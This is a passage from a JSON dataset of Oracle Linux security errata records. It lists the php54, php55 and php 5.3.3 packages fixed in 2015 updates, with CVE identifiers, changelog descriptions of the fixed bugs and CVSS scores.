"php54-php-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.40-3.el7", "arch": "x86_64", "packageFilename": "php54-php-enchant-5.4.40-3.el7.x86_64.rpm", "packageName": "php54-php-enchant", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.4.40-3.el6", "arch": "x86_64", "packageFilename": "php54-php-mysqlnd-5.4.40-3.el6.x86_64.rpm", "packageName": "php54-php-mysqlnd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.4.40-3.el6", "arch": "x86_64", "packageFilename": "php54-php-pdo-5.4.40-3.el6.x86_64.rpm", "packageName": "php54-php-pdo", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.40-3.el7", "arch": "x86_64", "packageFilename": "php54-php-devel-5.4.40-3.el7.x86_64.rpm", "packageName": "php54-php-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.40-3.el7", "arch": "x86_64", "packageFilename": "php54-php-common-5.4.40-3.el7.x86_64.rpm", "packageName": "php54-php-common", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.40-3.el7", "arch": "x86_64", "packageFilename": "php54-php-odbc-5.4.40-3.el7.x86_64.rpm", "packageName": "php54-php-odbc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.4.40-3.el6", "arch": "x86_64", "packageFilename": "php54-php-tidy-5.4.40-3.el6.x86_64.rpm", "packageName": "php54-php-tidy", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.4.40-3.el6", "arch": "x86_64", "packageFilename": "php54-php-bcmath-5.4.40-3.el6.x86_64.rpm", "packageName": "php54-php-bcmath", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.40-3.el7", "arch": "x86_64", "packageFilename": "php54-php-recode-5.4.40-3.el7.x86_64.rpm", "packageName": "php54-php-recode", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.4.40-3.el6", "arch": "x86_64", "packageFilename": "php54-php-snmp-5.4.40-3.el6.x86_64.rpm", "packageName": "php54-php-snmp", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.40-3.el7", "arch": "x86_64", "packageFilename": "php54-php-xmlrpc-5.4.40-3.el7.x86_64.rpm", "packageName": "php54-php-xmlrpc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.40-3.el7", "arch": "x86_64", "packageFilename": "php54-php-pdo-5.4.40-3.el7.x86_64.rpm", "packageName": "php54-php-pdo", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.4.40-3.el6", "arch": "x86_64", "packageFilename": "php54-php-imap-5.4.40-3.el6.x86_64.rpm", "packageName": "php54-php-imap", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.4.40-3.el6", "arch": "x86_64", "packageFilename": "php54-php-gd-5.4.40-3.el6.x86_64.rpm", "packageName": "php54-php-gd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.4.40-3.el6", "arch": "x86_64", "packageFilename": "php54-php-intl-5.4.40-3.el6.x86_64.rpm", "packageName": "php54-php-intl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.40-3.el7", "arch": "x86_64", "packageFilename": "php54-php-intl-5.4.40-3.el7.x86_64.rpm", "packageName": "php54-php-intl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.40-3.el7", "arch": "x86_64", "packageFilename": "php54-php-dba-5.4.40-3.el7.x86_64.rpm", "packageName": "php54-php-dba", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.40-3.el7", "arch": "x86_64", "packageFilename": "php54-php-xml-5.4.40-3.el7.x86_64.rpm", "packageName": "php54-php-xml", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.40-3.el7", "arch": "x86_64", "packageFilename": "php54-php-cli-5.4.40-3.el7.x86_64.rpm", "packageName": "php54-php-cli", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.40-3.el7", "arch": "x86_64", "packageFilename": "php54-php-ldap-5.4.40-3.el7.x86_64.rpm", "packageName": "php54-php-ldap", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.4.40-3.el6", "arch": "x86_64", "packageFilename": "php54-php-cli-5.4.40-3.el6.x86_64.rpm", "packageName": "php54-php-cli", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.40-3.el7", "arch": "x86_64", "packageFilename": "php54-php-5.4.40-3.el7.x86_64.rpm", "packageName": "php54-php", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.40-3.el7", "arch": "src", "packageFilename": "php54-php-5.4.40-3.el7.src.rpm", "packageName": "php54-php", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.40-3.el7", "arch": "x86_64", "packageFilename": "php54-php-gd-5.4.40-3.el7.x86_64.rpm", "packageName": "php54-php-gd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.4.40-3.el6", "arch": "x86_64", "packageFilename": "php54-php-process-5.4.40-3.el6.x86_64.rpm", "packageName": "php54-php-process", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.40-3.el7", "arch": "x86_64", "packageFilename": "php54-php-mbstring-5.4.40-3.el7.x86_64.rpm", "packageName": "php54-php-mbstring", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.4.40-3.el6", "arch": "x86_64", "packageFilename": "php54-php-recode-5.4.40-3.el6.x86_64.rpm", "packageName": "php54-php-recode", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.40-3.el7", "arch": "x86_64", "packageFilename": "php54-php-soap-5.4.40-3.el7.x86_64.rpm", "packageName": "php54-php-soap", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.4.40-3.el6", "arch": "x86_64", "packageFilename": "php54-php-pgsql-5.4.40-3.el6.x86_64.rpm", "packageName": "php54-php-pgsql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.4.40-3.el6", "arch": "x86_64", "packageFilename": "php54-php-5.4.40-3.el6.x86_64.rpm", "packageName": "php54-php", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.4.40-3.el6", "arch": "x86_64", "packageFilename": "php54-php-common-5.4.40-3.el6.x86_64.rpm", "packageName": "php54-php-common", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.4.40-3.el6", "arch": "x86_64", "packageFilename": "php54-php-pspell-5.4.40-3.el6.x86_64.rpm", "packageName": "php54-php-pspell", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.4.40-3.el6", "arch": "x86_64", "packageFilename": "php54-php-xml-5.4.40-3.el6.x86_64.rpm", "packageName": "php54-php-xml", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.4.40-3.el6", "arch": "x86_64", "packageFilename": "php54-php-odbc-5.4.40-3.el6.x86_64.rpm", "packageName": "php54-php-odbc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.40-3.el7", "arch": "x86_64", "packageFilename": "php54-php-mysqlnd-5.4.40-3.el7.x86_64.rpm", "packageName": "php54-php-mysqlnd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.4.40-3.el6", "arch": "x86_64", "packageFilename": "php54-php-mbstring-5.4.40-3.el6.x86_64.rpm", "packageName": "php54-php-mbstring", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.40-3.el7", "arch": "x86_64", "packageFilename": "php54-php-bcmath-5.4.40-3.el7.x86_64.rpm", "packageName": "php54-php-bcmath", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.4.40-3.el6", "arch": "x86_64", "packageFilename": "php54-php-soap-5.4.40-3.el6.x86_64.rpm", "packageName": "php54-php-soap", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.4.40-3.el6", "arch": "x86_64", "packageFilename": "php54-php-enchant-5.4.40-3.el6.x86_64.rpm", "packageName": "php54-php-enchant", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.40-3.el7", "arch": "x86_64", "packageFilename": "php54-php-snmp-5.4.40-3.el7.x86_64.rpm", "packageName": "php54-php-snmp", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.4.40-3.el6", "arch": "x86_64", "packageFilename": "php54-php-xmlrpc-5.4.40-3.el6.x86_64.rpm", "packageName": "php54-php-xmlrpc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.4.40-3.el6", "arch": "x86_64", "packageFilename": "php54-php-ldap-5.4.40-3.el6.x86_64.rpm", "packageName": "php54-php-ldap", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.40-3.el7", "arch": "x86_64", "packageFilename": "php54-php-pgsql-5.4.40-3.el7.x86_64.rpm", "packageName": "php54-php-pgsql", "operator": "lt"}], "description": "[5.4.40-3]\n- fix more functions accept paths with NUL character #1213407\n[5.4.40-2]\n- core: fix multipart/form-data request can use excessive\n amount of CPU usage CVE-2015-4024\n- fix various functions accept paths with NUL character\n CVE-2015-4025, CVE-2015-4026\n- ftp: fix integer overflow leading to heap overflow when\n reading FTP file listing CVE-2015-4022\n- phar: fix memory corruption in phar_parse_tarfile caused by\n empty entry file name CVE-2015-4021\n- pgsql: fix NULL pointer dereference CVE-2015-1352", "edition": 3, "reporter": "Oracle", "published": "2016-02-04T00:00:00", "title": "php54-php security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2015-4644", "CVE-2015-1352", "CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4026", "CVE-2015-4022", "CVE-2015-4598", "CVE-2015-4643"], "modified": "2016-02-04T00:00:00", "id": "ELSA-2015-1219", "href": "http://linux.oracle.com/errata/ELSA-2015-1219.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T01:47:53", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.5.21-4.el7", "arch": "x86_64", "packageFilename": "php55-php-pgsql-5.5.21-4.el7.x86_64.rpm", "packageName": "php55-php-pgsql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.5.21-4.el7", "arch": "x86_64", "packageFilename": "php55-php-cli-5.5.21-4.el7.x86_64.rpm", "packageName": "php55-php-cli", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.5.21-4.el7", "arch": "x86_64", "packageFilename": "php55-php-xmlrpc-5.5.21-4.el7.x86_64.rpm", "packageName": "php55-php-xmlrpc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.5.21-4.el7", "arch": "x86_64", "packageFilename": "php55-php-soap-5.5.21-4.el7.x86_64.rpm", "packageName": "php55-php-soap", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.5.21-4.el7", "arch": "x86_64", "packageFilename": "php55-php-bcmath-5.5.21-4.el7.x86_64.rpm", "packageName": "php55-php-bcmath", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.5.21-4.el7", "arch": "x86_64", "packageFilename": "php55-php-process-5.5.21-4.el7.x86_64.rpm", "packageName": "php55-php-process", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.5.21-4.el7", "arch": "x86_64", "packageFilename": "php55-php-common-5.5.21-4.el7.x86_64.rpm", "packageName": "php55-php-common", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.5.21-4.el7", "arch": "x86_64", "packageFilename": "php55-php-mbstring-5.5.21-4.el7.x86_64.rpm", "packageName": "php55-php-mbstring", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.5.21-4.el7", "arch": "x86_64", "packageFilename": "php55-php-gd-5.5.21-4.el7.x86_64.rpm", "packageName": "php55-php-gd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.5.21-4.el7", "arch": "x86_64", "packageFilename": "php55-php-pdo-5.5.21-4.el7.x86_64.rpm", "packageName": "php55-php-pdo", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.5.21-4.el7", "arch": "x86_64", "packageFilename": "php55-php-pspell-5.5.21-4.el7.x86_64.rpm", "packageName": "php55-php-pspell", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.5.21-4.el7", "arch": "x86_64", "packageFilename": "php55-php-opcache-5.5.21-4.el7.x86_64.rpm", "packageName": "php55-php-opcache", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.5.21-4.el7", "arch": "x86_64", "packageFilename": "php55-php-fpm-5.5.21-4.el7.x86_64.rpm", "packageName": "php55-php-fpm", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.5.21-4.el7", "arch": "x86_64", "packageFilename": "php55-php-odbc-5.5.21-4.el7.x86_64.rpm", "packageName": "php55-php-odbc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.5.21-4.el7", "arch": "x86_64", "packageFilename": "php55-php-xml-5.5.21-4.el7.x86_64.rpm", "packageName": "php55-php-xml", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.5.21-4.el7", "arch": "x86_64", "packageFilename": "php55-php-devel-5.5.21-4.el7.x86_64.rpm", "packageName": "php55-php-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.5.21-4.el7", "arch": "src", "packageFilename": "php55-php-5.5.21-4.el7.src.rpm", "packageName": "php55-php", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.5.21-4.el7", "arch": "x86_64", "packageFilename": "php55-php-recode-5.5.21-4.el7.x86_64.rpm", "packageName": "php55-php-recode", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.5.21-4.el7", "arch": "x86_64", "packageFilename": "php55-php-gmp-5.5.21-4.el7.x86_64.rpm", "packageName": "php55-php-gmp", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.5.21-4.el7", "arch": "x86_64", "packageFilename": "php55-php-snmp-5.5.21-4.el7.x86_64.rpm", "packageName": "php55-php-snmp", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.5.21-4.el7", "arch": "x86_64", "packageFilename": "php55-php-5.5.21-4.el7.x86_64.rpm", "packageName": "php55-php", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.5.21-4.el7", "arch": "x86_64", "packageFilename": "php55-php-mysqlnd-5.5.21-4.el7.x86_64.rpm", "packageName": "php55-php-mysqlnd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.5.21-4.el7", "arch": "x86_64", "packageFilename": "php55-php-ldap-5.5.21-4.el7.x86_64.rpm", "packageName": "php55-php-ldap", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.5.21-4.el7", "arch": "x86_64", "packageFilename": "php55-php-enchant-5.5.21-4.el7.x86_64.rpm", "packageName": "php55-php-enchant", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.5.21-4.el7", "arch": "x86_64", "packageFilename": "php55-php-dba-5.5.21-4.el7.x86_64.rpm", "packageName": "php55-php-dba", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.5.21-4.el7", "arch": "x86_64", "packageFilename": "php55-php-intl-5.5.21-4.el7.x86_64.rpm", "packageName": "php55-php-intl", "operator": "lt"}], "description": "[5.5.21-4]\n- fix more functions accept paths with NUL character #1213407\n[5.5.21-3]\n- core: fix multipart/form-data request can use excessive\n amount of CPU usage CVE-2015-4024\n- fix various functions accept paths with NUL character\n CVE-2015-4025, CVE-2015-4026, #1213407\n- fileinfo: fix denial of service when processing a crafted\n file #1213442\n- ftp: fix integer overflow leading to heap overflow when\n reading FTP file listing CVE-2015-4022\n- phar: fix buffer over-read in metadata parsing CVE-2015-2783\n- phar: invalid pointer free() in phar_tar_process_metadata()\n CVE-2015-3307\n- phar: fix buffer overflow in phar_set_inode() CVE-2015-3329\n- phar: fix memory corruption in phar_parse_tarfile caused by\n empty entry file name CVE-2015-4021\n- pgsql: fix NULL pointer dereference CVE-2015-1352\n- soap: fix type confusion through unserialize #1222538\n- apache2handler: fix pipelined request executed in deinitialized\n interpreter under httpd 2.4 CVE-2015-3330", "edition": 3, "reporter": "Oracle", "published": "2016-02-04T00:00:00", "title": "php55-php security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "bulletinFamily": "unix", "cvelist": ["CVE-2015-2783", "CVE-2015-3329", "CVE-2015-3330", "CVE-2015-4644", "CVE-2015-1352", "CVE-2015-4605", "CVE-2015-3307", "CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4602", "CVE-2015-4026", "CVE-2015-3411", "CVE-2015-4604", "CVE-2015-4022", "CVE-2015-3412", "CVE-2015-4603", "CVE-2015-4598", "CVE-2015-4643"], "modified": "2016-02-04T00:00:00", "id": "ELSA-2015-1186", "href": "http://linux.oracle.com/errata/ELSA-2015-1186.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:41:18", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageFilename": "php-enchant-5.3.3-46.el6_6.i686.rpm", "packageName": "php-enchant", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageFilename": "php-snmp-5.3.3-46.el6_6.i686.rpm", "packageName": "php-snmp", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageFilename": "php-cli-5.3.3-46.el6_6.x86_64.rpm", "packageName": "php-cli", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageFilename": "php-devel-5.3.3-46.el6_6.i686.rpm", "packageName": "php-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageFilename": "php-snmp-5.3.3-46.el6_6.x86_64.rpm", "packageName": "php-snmp", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageFilename": "php-fpm-5.3.3-46.el6_6.x86_64.rpm", "packageName": "php-fpm", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageFilename": "php-tidy-5.3.3-46.el6_6.x86_64.rpm", "packageName": "php-tidy", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageFilename": "php-ldap-5.3.3-46.el6_6.i686.rpm", "packageName": "php-ldap", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageFilename": "php-embedded-5.3.3-46.el6_6.i686.rpm", "packageName": "php-embedded", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageFilename": "php-soap-5.3.3-46.el6_6.i686.rpm", "packageName": "php-soap", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageFilename": "php-recode-5.3.3-46.el6_6.x86_64.rpm", "packageName": "php-recode", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageFilename": "php-enchant-5.3.3-46.el6_6.x86_64.rpm", "packageName": "php-enchant", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageFilename": "php-embedded-5.3.3-46.el6_6.x86_64.rpm", "packageName": "php-embedded", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageFilename": "php-pgsql-5.3.3-46.el6_6.x86_64.rpm", "packageName": "php-pgsql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageFilename": "php-5.3.3-46.el6_6.x86_64.rpm", "packageName": "php", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageFilename": "php-pgsql-5.3.3-46.el6_6.i686.rpm", "packageName": "php-pgsql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageFilename": "php-imap-5.3.3-46.el6_6.x86_64.rpm", "packageName": "php-imap", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageFilename": "php-gd-5.3.3-46.el6_6.x86_64.rpm", "packageName": "php-gd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageFilename": "php-odbc-5.3.3-46.el6_6.i686.rpm", "packageName": "php-odbc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageFilename": "php-xmlrpc-5.3.3-46.el6_6.x86_64.rpm", "packageName": "php-xmlrpc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageFilename": "php-mysql-5.3.3-46.el6_6.i686.rpm", "packageName": "php-mysql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageFilename": "php-odbc-5.3.3-46.el6_6.x86_64.rpm", "packageName": "php-odbc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageFilename": "php-common-5.3.3-46.el6_6.x86_64.rpm", "packageName": "php-common", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageFilename": "php-xmlrpc-5.3.3-46.el6_6.i686.rpm", "packageName": "php-xmlrpc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageFilename": "php-process-5.3.3-46.el6_6.x86_64.rpm", "packageName": "php-process", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageFilename": "php-devel-5.3.3-46.el6_6.x86_64.rpm", "packageName": "php-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageFilename": "php-mbstring-5.3.3-46.el6_6.x86_64.rpm", "packageName": "php-mbstring", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageFilename": "php-bcmath-5.3.3-46.el6_6.i686.rpm", "packageName": "php-bcmath", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageFilename": "php-pspell-5.3.3-46.el6_6.x86_64.rpm", "packageName": "php-pspell", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageFilename": "php-ldap-5.3.3-46.el6_6.x86_64.rpm", "packageName": "php-ldap", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageFilename": "php-intl-5.3.3-46.el6_6.x86_64.rpm", "packageName": "php-intl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageFilename": "php-zts-5.3.3-46.el6_6.i686.rpm", "packageName": "php-zts", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageFilename": "php-pdo-5.3.3-46.el6_6.x86_64.rpm", "packageName": "php-pdo", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageFilename": "php-mbstring-5.3.3-46.el6_6.i686.rpm", "packageName": "php-mbstring", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageFilename": "php-bcmath-5.3.3-46.el6_6.x86_64.rpm", "packageName": "php-bcmath", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageFilename": "php-mysql-5.3.3-46.el6_6.x86_64.rpm", "packageName": "php-mysql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageFilename": "php-xml-5.3.3-46.el6_6.i686.rpm", "packageName": "php-xml", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageFilename": "php-cli-5.3.3-46.el6_6.i686.rpm", "packageName": "php-cli", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageFilename": "php-5.3.3-46.el6_6.i686.rpm", "packageName": "php", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageFilename": "php-imap-5.3.3-46.el6_6.i686.rpm", "packageName": "php-imap", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageFilename": "php-process-5.3.3-46.el6_6.i686.rpm", "packageName": "php-process", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageFilename": "php-common-5.3.3-46.el6_6.i686.rpm", "packageName": "php-common", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageFilename": "php-recode-5.3.3-46.el6_6.i686.rpm", "packageName": "php-recode", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageFilename": "php-pspell-5.3.3-46.el6_6.i686.rpm", "packageName": "php-pspell", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageFilename": "php-gd-5.3.3-46.el6_6.i686.rpm", "packageName": "php-gd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageFilename": "php-pdo-5.3.3-46.el6_6.i686.rpm", "packageName": "php-pdo", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageFilename": "php-intl-5.3.3-46.el6_6.i686.rpm", "packageName": "php-intl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageFilename": "php-tidy-5.3.3-46.el6_6.i686.rpm", "packageName": "php-tidy", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageFilename": "php-dba-5.3.3-46.el6_6.i686.rpm", "packageName": "php-dba", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageFilename": "php-dba-5.3.3-46.el6_6.x86_64.rpm", "packageName": "php-dba", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", 